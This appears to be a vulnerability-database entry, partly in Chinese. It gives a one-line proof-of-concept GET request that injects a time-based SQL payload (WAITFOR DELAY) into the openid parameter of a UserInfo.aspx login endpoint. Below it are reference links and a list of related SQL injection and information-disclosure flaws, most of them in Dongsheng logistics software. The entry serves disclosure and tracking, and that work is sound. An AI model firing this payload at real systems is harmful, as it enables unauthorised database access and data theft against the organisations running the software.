PoC Copy GET /Areas/Mobile/Views/Login/UserInfo.aspx?openid=1%27WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1 # Visit https://trap.biu.life/ to view exploit trends for this vulnerability. Source: https://vip.vulbox.com/detail/1981548900175187968
References https://www.wlaqsys.com/archives/12189 https://blog.anhunsec.cn/fx/18.html https://cn-sec.com/archives/4633573.html https://cn-sec.com/archives/tag/userinfo-aspx https://github.com/adysec/POC https://starmap.dbappsecurity.com.cn/info/7130
Related VulnerabilitiesopenSIS-Classic /ResetUserInfo.php SQL 注入漏洞(CVE-2024-51211)锐明技术 Crocus系统 /Home.do GetUserInfo 信息泄露漏洞东胜物流管理软件 CrmProxyMailListHtmlGridSource.aspx 接口存在sql注入漏洞东胜物流管理软件 CrmProxyMailListGridSource.aspx 接口存在sql注入漏洞东胜物流管理软件 GetLanesList 存在SQL漏洞东胜物流管理软件 FeeModifySource.aspx 存在SQL注入漏洞青岛东胜伟业软件有限公司东胜物流软件UserAdapter.aspx 存在SQL注入漏洞PoC东胜物流管理软件 GetProParentModuTreeList 存在SQL注入漏洞.docx东胜物流软件 GetAuthorityRange 存在SQL注入漏洞青岛东胜伟业软件有限公司东胜物流软件GetUserMainFormSetInfo gid存在SQL注入漏洞青岛东胜伟业软件有限公司东胜物流软件AttributeGridSource.aspx checkcompid存在SQL注入漏洞青岛东胜伟业软件有限公司东胜物流软件ModuleGridSource.aspx searchdept存在SQL注入漏洞东胜物流软件 WmsRateLCLGridSource.aspx SQL注入漏洞